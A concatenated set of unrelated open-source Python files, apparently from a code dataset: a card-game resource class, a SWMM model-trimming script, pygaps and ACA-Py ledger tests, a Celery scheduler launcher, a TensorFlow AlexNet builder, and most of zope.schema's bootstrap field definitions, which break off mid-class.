    SET = card_info.CORE
    NUMBER = 52
    SIDE = card_info.RUNNER
    FACTION = card_info.NEUTRAL
    INFLUENCE = 0
    UNIQUE = False
    KEYWORDS = set([
        card_info.LINK,
    ])
    COST = 1
    IMAGE_SRC = '01052.png'
    def build_actions(self):
        # No card-specific actions beyond the base resource behaviour.
        resource.Resource.build_actions(self)
    def on_install(self):
        resource.Resource.on_install(self)
        # Installing grants the runner one point of link strength.
        self.player.link.gain(1)
    def on_uninstall(self):
        resource.Resource.on_uninstall(self)
        # Take the link bonus back when the card leaves play.
        self.player.link.lose(1)
9691463 | from shutil import copyfile
from get_contributing_area import get_upstream_nodes
from swmmio import swmmio
# Trim a SWMM input file: copy it to a *_tmp.inp sibling, then strip every
# line that mentions a node upstream of (or equal to) one of the
# non-important outfalls, rewriting the temp file in place.
model_input_file = "../hague_model/v2014_Hague_EX_10yr_MHHW_mod2_trim.inp"
model_input_file_tmp = model_input_file.replace(".inp", "_tmp.inp")
copyfile(model_input_file, model_input_file.replace(".inp", "_tmp.inp"))
mymodel = swmmio.Model(model_input_file)
nodes = mymodel.nodes()
cons = mymodel.conduits()
subs = mymodel.subcatchments()
# Outfalls whose contributing networks should be removed from the model.
non_important_outfalls = ['D14200', 'D143000', 'D14860', 'D1489', 'D14240', 'D14153', 'D14110',
                          'E14310', 'E145200', 'E14330', 'D14165', 'D14124', 'D14300']
# Collect every node upstream of each outfall, plus the outfall itself.
non_rel_nodes = []
for out in non_important_outfalls:
    us_nodes = get_upstream_nodes(out, cons)
    non_rel_nodes.extend(us_nodes)
    non_rel_nodes.append(out)
# Keep only lines that mention none of the removed node IDs.
# NOTE(review): this is substring matching, so an ID like 'D1489' would also
# drop lines for any longer ID containing it — confirm the IDs are unambiguous.
relevant_lines = []
with open(model_input_file_tmp, 'r') as inpfile:
    for line in inpfile:
        if all(node not in line for node in non_rel_nodes):
            relevant_lines.append(line)
with open(model_input_file_tmp, 'w') as inpfile:
    inpfile.writelines(relevant_lines)
6684589 | """Tests relating to the Material class."""
import pytest
import pygaps
@pytest.mark.core
class TestMaterial():
    """Test the material class."""
    def test_material_basic(self):
        """Basic creation tests."""
        mat = pygaps.Material('material1', 'batch')
        # Equality against a plain string — presumably Material.__eq__
        # compares by name; verify against the class definition.
        assert mat == 'material1'
        assert mat != 'Material1'
        mat2 = pygaps.Material('material1', 'batch')
        assert mat == mat2
    def test_material_create(self, material_data, basic_material):
        """Check material can be created from test data."""
        assert material_data == basic_material.to_dict()
    def test_material_retrieved_list(self, material_data, basic_material):
        """Check material can be retrieved from master list."""
        # NOTE(review): appends to the global MATERIAL_LIST without cleanup,
        # so this test leaks state into subsequent tests.
        pygaps.data.MATERIAL_LIST.append(basic_material)
        uploaded_material = pygaps.Material.find(
            material_data.get('name'),
            material_data.get('batch'))
        assert material_data == uploaded_material.to_dict()
        with pytest.raises(pygaps.ParameterError):
            pygaps.Material.find('noname', 'nobatch')
    def test_material_get_properties(self, material_data, basic_material):
        """Check if properties of a material can be located."""
        assert basic_material.get_prop(
            'density') == material_data.get('density')
        # Removing the property must make get_prop raise; restore it after.
        density = basic_material.properties.pop('density')
        with pytest.raises(pygaps.ParameterError):
            basic_material.get_prop('density')
        basic_material.properties['density'] = density
    def test_material_print(self, basic_material):
        """Checks the printing can be done."""
        print(basic_material)
11216368 | <filename>server/start_scheduler.py
#!/usr/bin/env python
import django, os, subprocess, sys, shlex
sys.path.append(os.path.dirname(__file__))
if __name__ == "__main__":
    # Bootstrap Django before importing ORM models.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "dva.settings")
    django.setup()
    from django_celery_beat.models import PeriodicTask, IntervalSchedule
    # Register the two periodic tasks on the 'qscheduler' queue.
    # NOTE(review): a single REFRESH_MINUTES env var overrides *both*
    # intervals, making the 'every_three_minutes' name misleading when set.
    every_three_minutes, _ = IntervalSchedule.objects.get_or_create(every=os.environ.get('REFRESH_MINUTES', 3),
                                                                    period=IntervalSchedule.MINUTES)
    every_minute, _ = IntervalSchedule.objects.get_or_create(every=os.environ.get('REFRESH_MINUTES', 1),
                                                             period=IntervalSchedule.MINUTES)
    _ = PeriodicTask.objects.get_or_create(name="refresher", task="monitor_retrievers", interval=every_minute,
                                           queue='qscheduler')
    _ = PeriodicTask.objects.get_or_create(name="monitoring", task="monitor_system", interval=every_three_minutes,
                                           queue='qscheduler')
    # Launch the queue worker in the background, then run celery beat in the
    # foreground (check_call blocks until beat exits).
    p = subprocess.Popen(['./startq.py', 'qscheduler'])
    # Remove stale celerybeat pidfile which happens in dev mode
    if os.path.isfile('celerybeat.pid'):
        os.remove('celerybeat.pid')
    subprocess.check_call(shlex.split(
        "celery -A dva beat -l info --scheduler django_celery_beat.schedulers:DatabaseScheduler -f ../logs/beat.log"))
9763829 | <reponame>kingzhengguang/tensorflow_alexnet_classify-cat-dog-
import tensorflow as tf
def alexnet(x, keep_prob, num_classes):
    """Build the classic AlexNet graph (TF1 API) and return the fc8 logits.

    x: input image batch — assumes NHWC with 3 channels and a spatial size
    that yields a 6x6x256 pool5 output (classic AlexNet uses 227x227) —
    TODO confirm against the training pipeline.
    keep_prob: dropout keep probability for fc6/fc7.
    num_classes: width of the final fc8 logits layer.

    conv2/conv4/conv5 reproduce the original two-GPU grouped convolutions
    by splitting the channel axis in two, convolving each half separately,
    and concatenating the results.
    """
    # conv1
    with tf.name_scope('conv1') as scope:
        kernel = tf.Variable(tf.truncated_normal([11, 11, 3, 96], dtype=tf.float32,
                                                 stddev=1e-1), name='weights')
        conv = tf.nn.conv2d(x, kernel, [1, 4, 4, 1], padding='SAME')
        biases = tf.Variable(tf.constant(0.0, shape=[96], dtype=tf.float32),
                             trainable=True, name='biases')
        bias = tf.nn.bias_add(conv, biases)
        conv1 = tf.nn.relu(bias, name=scope)
    # lrn1
    with tf.name_scope('lrn1') as scope:
        lrn1 = tf.nn.local_response_normalization(conv1,
                                                  alpha=1e-4,
                                                  beta=0.75,
                                                  depth_radius=2,
                                                  bias=2.0)
    # pool1
    with tf.name_scope('pool1') as scope:
        pool1 = tf.nn.max_pool(lrn1,
                               ksize=[1, 3, 3, 1],
                               strides=[1, 2, 2, 1],
                               padding='VALID')
    # conv2 — grouped convolution: split inputs and kernels in two along the
    # channel axis, convolve each half, then concatenate.
    with tf.name_scope('conv2') as scope:
        pool1_groups = tf.split(axis=3, value = pool1, num_or_size_splits = 2)
        kernel = tf.Variable(tf.truncated_normal([5, 5, 48, 256], dtype=tf.float32,
                                                 stddev=1e-1), name='weights')
        kernel_groups = tf.split(axis=3, value = kernel, num_or_size_splits = 2)
        conv_up = tf.nn.conv2d(pool1_groups[0], kernel_groups[0], [1,1,1,1], padding='SAME')
        conv_down = tf.nn.conv2d(pool1_groups[1], kernel_groups[1], [1,1,1,1], padding='SAME')
        biases = tf.Variable(tf.constant(0.0, shape=[256], dtype=tf.float32),
                             trainable=True, name='biases')
        biases_groups = tf.split(axis=0, value=biases, num_or_size_splits=2)
        bias_up = tf.nn.bias_add(conv_up, biases_groups[0])
        bias_down = tf.nn.bias_add(conv_down, biases_groups[1])
        bias = tf.concat(axis=3, values=[bias_up, bias_down])
        conv2 = tf.nn.relu(bias, name=scope)
    # lrn2
    with tf.name_scope('lrn2') as scope:
        lrn2 = tf.nn.local_response_normalization(conv2,
                                                  alpha=1e-4,
                                                  beta=0.75,
                                                  depth_radius=2,
                                                  bias=2.0)
    # pool2
    with tf.name_scope('pool2') as scope:
        pool2 = tf.nn.max_pool(lrn2,
                               ksize=[1, 3, 3, 1],
                               strides=[1, 2, 2, 1],
                               padding='VALID')
    # conv3 — the only ungrouped middle convolution.
    with tf.name_scope('conv3') as scope:
        kernel = tf.Variable(tf.truncated_normal([3, 3, 256, 384],
                                                 dtype=tf.float32,
                                                 stddev=1e-1), name='weights')
        conv = tf.nn.conv2d(pool2, kernel, [1, 1, 1, 1], padding='SAME')
        biases = tf.Variable(tf.constant(0.0, shape=[384], dtype=tf.float32),
                             trainable=True, name='biases')
        bias = tf.nn.bias_add(conv, biases)
        conv3 = tf.nn.relu(bias, name=scope)
    # conv4 — grouped, same split/concat pattern as conv2.
    with tf.name_scope('conv4') as scope:
        conv3_groups = tf.split(axis=3, value=conv3, num_or_size_splits=2)
        kernel = tf.Variable(tf.truncated_normal([3, 3, 192, 384],
                                                 dtype=tf.float32,
                                                 stddev=1e-1), name='weights')
        kernel_groups = tf.split(axis=3, value=kernel, num_or_size_splits=2)
        conv_up = tf.nn.conv2d(conv3_groups[0], kernel_groups[0], [1, 1, 1, 1], padding='SAME')
        conv_down = tf.nn.conv2d(conv3_groups[1], kernel_groups[1], [1,1,1,1], padding='SAME')
        biases = tf.Variable(tf.constant(0.0, shape=[384], dtype=tf.float32),
                             trainable=True, name='biases')
        biases_groups = tf.split(axis=0, value=biases, num_or_size_splits=2)
        bias_up = tf.nn.bias_add(conv_up, biases_groups[0])
        bias_down = tf.nn.bias_add(conv_down, biases_groups[1])
        bias = tf.concat(axis=3, values=[bias_up,bias_down])
        conv4 = tf.nn.relu(bias, name=scope)
    # conv5 — grouped, same split/concat pattern as conv2.
    with tf.name_scope('conv5') as scope:
        conv4_groups = tf.split(axis=3, value=conv4, num_or_size_splits=2)
        kernel = tf.Variable(tf.truncated_normal([3, 3, 192, 256],
                                                 dtype=tf.float32,
                                                 stddev=1e-1), name='weights')
        kernel_groups = tf.split(axis=3, value=kernel, num_or_size_splits=2)
        conv_up = tf.nn.conv2d(conv4_groups[0], kernel_groups[0], [1, 1, 1, 1], padding='SAME')
        conv_down = tf.nn.conv2d(conv4_groups[1], kernel_groups[1], [1,1,1,1], padding='SAME')
        biases = tf.Variable(tf.constant(0.0, shape=[256], dtype=tf.float32),
                             trainable=True, name='biases')
        biases_groups = tf.split(axis=0, value=biases, num_or_size_splits=2)
        bias_up = tf.nn.bias_add(conv_up, biases_groups[0])
        bias_down = tf.nn.bias_add(conv_down, biases_groups[1])
        bias = tf.concat(axis=3, values=[bias_up,bias_down])
        conv5 = tf.nn.relu(bias, name=scope)
    # pool5
    with tf.name_scope('pool5') as scope:
        pool5 = tf.nn.max_pool(conv5,
                               ksize=[1, 3, 3, 1],
                               strides=[1, 2, 2, 1],
                               padding='VALID',)
    # flattened6 — hard-codes the 6*6*256 pool5 size (see docstring note).
    with tf.name_scope('flattened6') as scope:
        flattened = tf.reshape(pool5, shape=[-1, 6*6*256])
    # fc6
    with tf.name_scope('fc6') as scope:
        weights = tf.Variable(tf.truncated_normal([6*6*256, 4096],
                                                  dtype=tf.float32,
                                                  stddev=1e-1), name='weights')
        biases = tf.Variable(tf.constant(0.0, shape=[4096], dtype=tf.float32),
                             trainable=True, name='biases')
        bias = tf.nn.xw_plus_b(flattened, weights, biases)
        fc6 = tf.nn.relu(bias)
    # dropout6
    with tf.name_scope('dropout6') as scope:
        dropout6 = tf.nn.dropout(fc6, keep_prob)
    # fc7
    with tf.name_scope('fc7') as scope:
        weights = tf.Variable(tf.truncated_normal([4096,4096],
                                                  dtype=tf.float32,
                                                  stddev=1e-1), name='weights')
        biases = tf.Variable(tf.constant(0.0, shape=[4096], dtype=tf.float32),
                             trainable=True, name='biases')
        bias = tf.nn.xw_plus_b(dropout6, weights, biases)
        fc7 = tf.nn.relu(bias)
    # dropout7
    with tf.name_scope('dropout7') as scope:
        dropout7 = tf.nn.dropout(fc7, keep_prob)
    # fc8 — final linear layer; no activation (raw logits).
    with tf.name_scope('fc8') as scope:
        weights = tf.Variable(tf.truncated_normal([4096, num_classes],
                                                  dtype=tf.float32,
                                                  stddev=1e-1), name='weights')
        biases = tf.Variable(tf.constant(0.0, shape=[num_classes], dtype=tf.float32),
                             trainable=True, name='biases')
        fc8 = tf.nn.xw_plus_b(dropout7, weights, biases)
    return fc8
173517 | import pytest
from fastapi import HTTPException
from mockito import when
from acapy_ledger_facade import get_taa, accept_taa, get_did_endpoint
# need this to handle the async with the mock
async def get(response):
    """Awaitable stub that immediately yields *response* unchanged
    (used so mockito stubs can stand in for async client calls)."""
    result = response
    return result
@pytest.mark.asyncio
async def test_error_on_get_taa(mock_agent_controller):
    """An empty TAA response from the ledger surfaces as a 404 HTTPException."""
    when(mock_agent_controller.ledger).get_taa().thenReturn(get({}))
    with pytest.raises(HTTPException) as exc:
        await get_taa(mock_agent_controller)
    assert exc.value.status_code == 404
    assert exc.value.detail == "Something went wrong. Could not get TAA. {}"
@pytest.mark.asyncio
async def test_error_on_accept_taa(mock_agent_controller):
    """A non-empty error payload from accept_taa surfaces as a 404 whose
    detail embeds the stringified response."""
    error_response = {"x": "y"}
    when(mock_agent_controller.ledger).accept_taa("data").thenReturn(
        get(error_response)
    )
    with pytest.raises(HTTPException) as exc:
        await accept_taa(mock_agent_controller, "data")
    assert exc.value.status_code == 404
    assert (
        exc.value.detail
        == f"Something went wrong. Could not accept TAA. {str(error_response)}"
    )
@pytest.mark.asyncio
async def test_error_on_get_did_endpoint(mock_agent_controller):
    """A None endpoint response surfaces as a 404 with a fixed message."""
    when(mock_agent_controller.ledger).get_did_endpoint("data").thenReturn(get(None))
    with pytest.raises(HTTPException) as exc:
        await get_did_endpoint(mock_agent_controller, "data")
    assert exc.value.status_code == 404
    assert (
        # Fix: plain string literal — the former f-string had no placeholders.
        exc.value.detail == "Something went wrong. Could not obtain issuer endpoint."
    )
| StarcoderdataPython |
5120798 | # -*- coding: utf-8 -*-
"""sub.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1zbz7f1U5qW3qRg9u_boBMz8jwsg6ffVS
"""
def subtract(n1, n2):
    """Print the difference n1 - n2 to stdout (returns None)."""
    difference = n1 - n2
    print(difference)
#edited version
| StarcoderdataPython |
8056728 | <reponame>tharindu1st/apim-migration-resources<filename>apim-migration-testing-tool/Python/venv/lib/python3.6/site-packages/zope/schema/_bootstrapfields.py<gh_stars>0
##############################################################################
#
# Copyright (c) 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Bootstrapping fields
"""
__docformat__ = 'restructuredtext'
import decimal
import fractions
import numbers
import sys
import threading
from math import isinf
from zope.interface import Attribute
from zope.interface import Invalid
from zope.interface import Interface
from zope.interface import providedBy
from zope.interface import implementer
from zope.interface.interface import InterfaceClass
from zope.interface.interfaces import IInterface
from zope.interface.interfaces import IMethod
from zope.event import notify
from zope.schema._bootstrapinterfaces import ConstraintNotSatisfied
from zope.schema._bootstrapinterfaces import IBeforeObjectAssignedEvent
from zope.schema._bootstrapinterfaces import IContextAwareDefaultFactory
from zope.schema._bootstrapinterfaces import IFromBytes
from zope.schema._bootstrapinterfaces import IFromUnicode
from zope.schema._bootstrapinterfaces import IValidatable
from zope.schema._bootstrapinterfaces import NotAContainer
from zope.schema._bootstrapinterfaces import NotAnIterator
from zope.schema._bootstrapinterfaces import NotAnInterface
from zope.schema._bootstrapinterfaces import RequiredMissing
from zope.schema._bootstrapinterfaces import SchemaNotCorrectlyImplemented
from zope.schema._bootstrapinterfaces import SchemaNotFullyImplemented
from zope.schema._bootstrapinterfaces import SchemaNotProvided
from zope.schema._bootstrapinterfaces import StopValidation
from zope.schema._bootstrapinterfaces import TooBig
from zope.schema._bootstrapinterfaces import TooLong
from zope.schema._bootstrapinterfaces import TooShort
from zope.schema._bootstrapinterfaces import TooSmall
from zope.schema._bootstrapinterfaces import ValidationError
from zope.schema._bootstrapinterfaces import WrongType
from zope.schema._compat import text_type
from zope.schema._compat import integer_types
from zope.schema._compat import PY2
class _NotGiven(object):
    # Singleton sentinel meaning "argument was not supplied", distinct from
    # None (which can be a legitimate value). The class is immediately
    # replaced below by its only instance.
    def __repr__(self): # pragma: no cover
        return "<Not Given>"
_NotGiven = _NotGiven()
class ValidatedProperty(object):
    """Data descriptor that validates a value before storing it in the
    owning instance's __dict__ under *name*.

    *check*, when given, replaces the instance's own ``validate`` method;
    *allow_none* additionally exempts None from validation.
    """
    def __init__(self, name, check=None, allow_none=False):
        self._name = name
        self._check = check
        self._allow_none = allow_none
    def __set__(self, inst, value):
        # The field's missing_value (and None when allow_none) means
        # "no value" and is stored without validation.
        bypass_validation = (value is None and self._allow_none) or value == inst.missing_value
        if not bypass_validation:
            if self._check is not None:
                self._check(inst, value)
            else:
                inst.validate(value)
        inst.__dict__[self._name] = value
    def __get__(self, inst, owner):
        if inst is None:
            # Accessed on the class: return the descriptor itself.
            return self
        return inst.__dict__[self._name]
class DefaultProperty(ValidatedProperty):
    """ValidatedProperty for ``default`` that defers to ``defaultFactory``.

    When the instance has a defaultFactory, the stored default is ignored:
    the factory is called (with the field's context if it provides
    IContextAwareDefaultFactory) and the produced value is validated
    before being returned.
    """
    def __get__(self, inst, owner):
        if inst is None:
            return self
        defaultFactory = inst.__dict__.get('defaultFactory')
        # If there is no default factory, simply return the default.
        if defaultFactory is None:
            return inst.__dict__[self._name]
        # Get the default value by calling the factory. Some factories might
        # require a context to produce a value.
        if IContextAwareDefaultFactory.providedBy(defaultFactory):
            value = defaultFactory(inst.context)
        else:
            value = defaultFactory()
        # Check that the created value is valid.
        if self._check is not None:
            self._check(inst, value)
        elif value != inst.missing_value:
            inst.validate(value)
        return value
def getFields(schema):
    """Return a dictionary containing all the Fields in a schema.

    Maps attribute name to the schema attribute for every attribute that
    provides IValidatable (i.e. is a field, not a plain attribute/method).
    """
    return {name: schema[name]
            for name in schema
            if IValidatable.providedBy(schema[name])}
class _DocStringHelpers(object):
    # Namespace object to hold methods related to ReST formatting
    # docstrings
    @staticmethod
    def docstring_to_lines(docstring):
        # Similar to what sphinx.utils.docstrings.prepare_docstring
        # does. Strip leading equal whitespace, accounting for an initial line
        # that might not have any. Return a list of lines, with a trailing
        # blank line.
        lines = docstring.expandtabs().splitlines()
        # Find minimum indentation of any non-blank lines after ignored lines.
        margin = sys.maxsize
        for line in lines[1:]:
            content = len(line.lstrip())
            if content:
                indent = len(line) - content
                margin = min(margin, indent)
        # Remove indentation from first ignored lines.
        if len(lines) >= 1:
            lines[0] = lines[0].lstrip()
        if margin < sys.maxsize:
            # Dedent every line after the first by the common margin.
            for i in range(1, len(lines)):
                lines[i] = lines[i][margin:]
        # Remove any leading blank lines.
        while lines and not lines[0]:
            lines.pop(0)
        #
        lines.append('')
        return lines
    @staticmethod
    def make_class_directive(kind):
        # Build a Sphinx ":class:`module.Name`" cross-reference, collapsing
        # builtins to a bare name and this package's internals to zope.schema.
        mod = kind.__module__
        if kind.__module__ in ('__builtin__', 'builtins'):
            mod = ''
        if mod in ('zope.schema._bootstrapfields', 'zope.schema._field'):
            mod = 'zope.schema'
        mod += '.' if mod else ''
        return ':class:`%s%s`' % (mod, kind.__name__)
    @classmethod
    def make_field(cls, name, value):
        # ReST field-list entry: ":name: value".
        return ":%s: %s" % (name, value)
    @classmethod
    def make_class_field(cls, name, kind):
        # Like make_field, but renders a class (or tuple of classes) as
        # cross-reference directives. Returns None implicitly for other kinds.
        if isinstance(kind, (type, InterfaceClass)):
            return cls.make_field(name, cls.make_class_directive(kind))
        if isinstance(kind, tuple):
            return cls.make_field(
                name,
                ', '.join([cls.make_class_directive(t) for t in kind]))
class Field(Attribute):
    # Base schema field: extends zope.interface's Attribute with
    # validation, defaults, creation-order tracking and binding.
    # Type restrictions, if any
    _type = None
    context = None
    # If a field has no assigned value, it will be set to missing_value.
    missing_value = None
    # This is the default value for the missing_value argument to the
    # Field constructor. A marker is helpful since we don't want to
    # overwrite missing_value if it is set differently on a Field
    # subclass and isn't specified via the constructor.
    __missing_value_marker = _NotGiven
    # Note that the "order" field has a dual existance:
    # 1. The class variable Field.order is used as a source for the
    #    monotonically increasing values used to provide...
    # 2. The instance variable self.order which provides a
    #    monotonically increasing value that tracks the creation order
    #    of Field (including Field subclass) instances.
    order = 0
    default = DefaultProperty('default')
    # These were declared as slots in zope.interface, we override them here to
    # get rid of the descriptors so they don't break .bind()
    __name__ = None
    interface = None
    _Element__tagged_values = None
    def __init__(self, title=u'', description=u'', __name__='',
                 required=True, readonly=False, constraint=None, default=None,
                 defaultFactory=None, missing_value=__missing_value_marker):
        """Pass in field values as keyword parameters.
        Generally, you want to pass either a title and description, or
        a doc string. If you pass no doc string, it will be computed
        from the title and description. If you pass a doc string that
        follows the Python coding style (title line separated from the
        body by a blank line), the title and description will be
        computed from the doc string. Unfortunately, the doc string
        must be passed as a positional argument.
        Here are some examples:
        >>> from zope.schema._bootstrapfields import Field
        >>> f = Field()
        >>> f.__doc__, str(f.title), str(f.description)
        ('', '', '')
        >>> f = Field(title=u'sample')
        >>> str(f.__doc__), str(f.title), str(f.description)
        ('sample', 'sample', '')
        >>> f = Field(title=u'sample', description=u'blah blah\\nblah')
        >>> str(f.__doc__), str(f.title), str(f.description)
        ('sample\\n\\nblah blah\\nblah', 'sample', 'blah blah\\nblah')
        """
        __doc__ = ''
        # Fix leading whitespace that occurs when using multi-line
        # strings, but don't overwrite the original, we need to
        # preserve it (it could be a MessageID).
        doc_description = '\n'.join(
            _DocStringHelpers.docstring_to_lines(description or u'')[:-1]
        )
        if title:
            if doc_description:
                __doc__ = "%s\n\n%s" % (title, doc_description)
            else:
                __doc__ = title
        elif description:
            __doc__ = doc_description
        super(Field, self).__init__(__name__, __doc__)
        self.title = title
        self.description = description
        self.required = required
        self.readonly = readonly
        if constraint is not None:
            # A per-instance constraint shadows the constraint() method.
            self.constraint = constraint
        self.default = default
        self.defaultFactory = defaultFactory
        # Keep track of the order of field definitions
        Field.order += 1
        self.order = Field.order
        if missing_value is not self.__missing_value_marker:
            self.missing_value = missing_value
    def constraint(self, value):
        # Default constraint: accept every value.  Replaced per instance
        # when a ``constraint`` callable is passed to the constructor.
        return True
    def bind(self, context):
        # Return a shallow clone of this field with ``context`` set;
        # the original field is left unchanged.
        clone = self.__class__.__new__(self.__class__)
        clone.__dict__.update(self.__dict__)
        clone.context = context
        return clone
    def validate(self, value):
        # Raise a ValidationError subclass if *value* is not valid for
        # this field; returns None on success.
        if value == self.missing_value:
            if self.required:
                raise RequiredMissing(self.__name__).with_field_and_value(self, value)
        else:
            try:
                self._validate(value)
            except StopValidation:
                # A constraint signalled that no further validation is
                # needed: accept the value.
                pass
    def __get_property_names_to_compare(self):
        # Return the set of property names to compare, ignoring
        # order
        names = {}  # used as set of property names, ignoring values
        for interface in providedBy(self):
            names.update(getFields(interface))
        # order will be different always, don't compare it
        names.pop('order', None)
        return names
    def __hash__(self):
        # Equal objects should have equal hashes;
        # equal hashes does not imply equal objects.
        value = (type(self), self.interface) + tuple(self.__get_property_names_to_compare())
        return hash(value)
    def __eq__(self, other):
        # should be the same type and in the same interface (or no interface at all)
        if self is other:
            return True
        if type(self) != type(other) or self.interface != other.interface:
            return False
        # should have the same properties
        names = self.__get_property_names_to_compare()
        # XXX: What about the property names of the other object? Even
        # though it's the same type, it could theoretically have
        # another interface that it `alsoProvides`.
        for name in names:
            if getattr(self, name) != getattr(other, name):
                return False
        return True
    def __ne__(self, other):
        return not self.__eq__(other)
    def _validate(self, value):
        # Subclass hook: type check first, then the constraint.
        if self._type is not None and not isinstance(value, self._type):
            raise WrongType(value, self._type, self.__name__).with_field_and_value(self, value)
        try:
            constraint = self.constraint(value)
        except ValidationError as e:
            # Annotate the error with this field/value if the
            # constraint didn't already do so.
            if e.field is None:
                e.field = self
            if e.value is None:
                e.value = value
            raise
        if not constraint:
            raise ConstraintNotSatisfied(value, self.__name__).with_field_and_value(self, value)
    def get(self, object):
        # Read this field's value from *object*; AttributeError if absent.
        return getattr(object, self.__name__)
    def query(self, object, default=None):
        # Like get(), but return *default* instead of raising.
        return getattr(object, self.__name__, default)
    def set(self, object, value):
        # Write this field's value onto *object*; refused for
        # read-only fields.
        if self.readonly:
            raise TypeError("Can't set values on read-only fields "
                            "(name=%s, class=%s.%s)"
                            % (self.__name__,
                               object.__class__.__module__,
                               object.__class__.__name__))
        setattr(object, self.__name__, value)
    def getExtraDocLines(self):
        """
        Return a list of ReST formatted lines that will be added
        to the docstring returned by :meth:`getDoc`.
        By default, this will include information about the various
        properties of this object, such as required and readonly status,
        required type, and so on.
        This implementation uses a field list for this.
        Subclasses may override or extend.
        .. versionadded:: 4.6.0
        """
        lines = []
        lines.append(_DocStringHelpers.make_class_field('Implementation', type(self)))
        lines.append(_DocStringHelpers.make_field("Read Only", self.readonly))
        lines.append(_DocStringHelpers.make_field("Required", self.required))
        if self.defaultFactory:
            lines.append(_DocStringHelpers.make_field("Default Factory", repr(self.defaultFactory)))
        else:
            lines.append(_DocStringHelpers.make_field("Default Value", repr(self.default)))
        if self._type:
            lines.append(_DocStringHelpers.make_class_field("Allowed Type", self._type))
        # key_type and value_type are commonly used, but don't
        # have a common superclass to add them, so we do it here.
        # Using a rubric produces decent formatting
        for name, rubric in (('key_type', 'Key Type'),
                             ('value_type', 'Value Type')):
            field = getattr(self, name, None)
            if hasattr(field, 'getDoc'):
                lines.append("")
                lines.append(".. rubric:: " + rubric)
                lines.append("")
                lines.append(field.getDoc())
        return lines
    def getDoc(self):
        # Combine the base docstring with the extra field-list lines.
        doc = super(Field, self).getDoc()
        lines = _DocStringHelpers.docstring_to_lines(doc)
        lines += self.getExtraDocLines()
        lines.append('')
        return '\n'.join(lines)
class Container(Field):
    # A field whose values must support containment tests (``in``),
    # either via __contains__ or by being iterable.
    def _validate(self, value):
        super(Container, self)._validate(value)
        if not hasattr(value, '__contains__'):
            try:
                iter(value)
            except TypeError:
                raise NotAContainer(value).with_field_and_value(self, value)
# XXX This class violates the Liskov Substituability Principle: it
# is derived from Container, but cannot be used everywhere an instance
# of Container could be, because it's '_validate' is more restrictive.
class Iterable(Container):
    # A field whose values must be iterable (stricter than Container:
    # supporting only __contains__ is not enough here).
    def _validate(self, value):
        super(Iterable, self)._validate(value)
        # See if we can get an iterator for it
        try:
            iter(value)
        except TypeError:
            raise NotAnIterator(value).with_field_and_value(self, value)
class Orderable(object):
    """Values of ordered fields can be sorted.
    They can be restricted to a range of values.
    Orderable is a mixin used in combination with Field.
    """
    # min/max assignments are validated through the field itself.
    min = ValidatedProperty('min', allow_none=True)
    max = ValidatedProperty('max', allow_none=True)
    def __init__(self, min=None, max=None, default=None, **kw):
        # Set min and max to None so that we can validate if
        # one of the super methods invoke validation.
        self.min = None
        self.max = None
        super(Orderable, self).__init__(**kw)
        # Now really set min and max
        self.min = min
        self.max = max
        # We've taken over setting default so it can be limited by min
        # and max.
        self.default = default
    def _validate(self, value):
        # Range check on top of the inherited validation.
        super(Orderable, self)._validate(value)
        if self.min is not None and value < self.min:
            raise TooSmall(value, self.min).with_field_and_value(self, value)
        if self.max is not None and value > self.max:
            raise TooBig(value, self.max).with_field_and_value(self, value)
class MinMaxLen(object):
    """Expresses constraints on the length of a field.
    MinMaxLen is a mixin used in combination with Field.
    """
    min_length = 0
    max_length = None
    def __init__(self, min_length=0, max_length=None, **kw):
        self.min_length = min_length
        self.max_length = max_length
        super(MinMaxLen, self).__init__(**kw)
    def _validate(self, value):
        # Length check on top of the inherited validation.
        super(MinMaxLen, self)._validate(value)
        if self.min_length is not None and len(value) < self.min_length:
            raise TooShort(value, self.min_length).with_field_and_value(self, value)
        if self.max_length is not None and len(value) > self.max_length:
            raise TooLong(value, self.max_length).with_field_and_value(self, value)
@implementer(IFromUnicode)
class Text(MinMaxLen, Field):
    """A field containing text used for human discourse."""
    _type = text_type
    def __init__(self, *args, **kw):
        super(Text, self).__init__(*args, **kw)
    def fromUnicode(self, str):
        """
        >>> from zope.schema.interfaces import WrongType
        >>> from zope.schema.interfaces import ConstraintNotSatisfied
        >>> from zope.schema import Text
        >>> from zope.schema._compat import text_type
        >>> t = Text(constraint=lambda v: 'x' in v)
        >>> t.fromUnicode(b"foo x spam") # doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        ...
        zope.schema._bootstrapinterfaces.WrongType: ('foo x spam', <type 'unicode'>, '')
        >>> result = t.fromUnicode(u"foo x spam")
        >>> isinstance(result, bytes)
        False
        >>> str(result)
        'foo x spam'
        >>> t.fromUnicode(u"foo spam") # doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        ...
        zope.schema._bootstrapinterfaces.ConstraintNotSatisfied: (u'foo spam', '')
        """
        # NOTE: the parameter shadows the builtin ``str``; kept as-is
        # for backward compatibility with keyword callers.
        self.validate(str)
        return str
class TextLine(Text):
    """A single-line text field: values may contain neither newline
    nor carriage-return characters."""
    def constraint(self, value):
        # Reject the value if either line-break character appears.
        return not ('\n' in value or '\r' in value)
class Password(TextLine):
    """A text field containing a text used as a password."""
    UNCHANGED_PASSWORD = object()  # sentinel: "keep the stored password"
    def set(self, context, value):
        """Update the password.
        We use a special marker value that a widget can use
        to tell us that the password didn't change. This is
        needed to support edit forms that don't display the
        existing password and want to work together with
        encryption.
        """
        if value is self.UNCHANGED_PASSWORD:
            return
        super(Password, self).set(context, value)
    def validate(self, value):
        # Only accept the sentinel when a password already exists on
        # the bound context; otherwise fall back to normal validation.
        try:
            existing = bool(self.get(self.context))
        except AttributeError:
            existing = False
        if value is self.UNCHANGED_PASSWORD and existing:
            # Allow the UNCHANGED_PASSWORD value, if a password is set already
            return
        return super(Password, self).validate(value)
@implementer(IFromUnicode, IFromBytes)
class Bool(Field):
    """
    A field representing a Bool.
    .. versionchanged:: 4.8.0
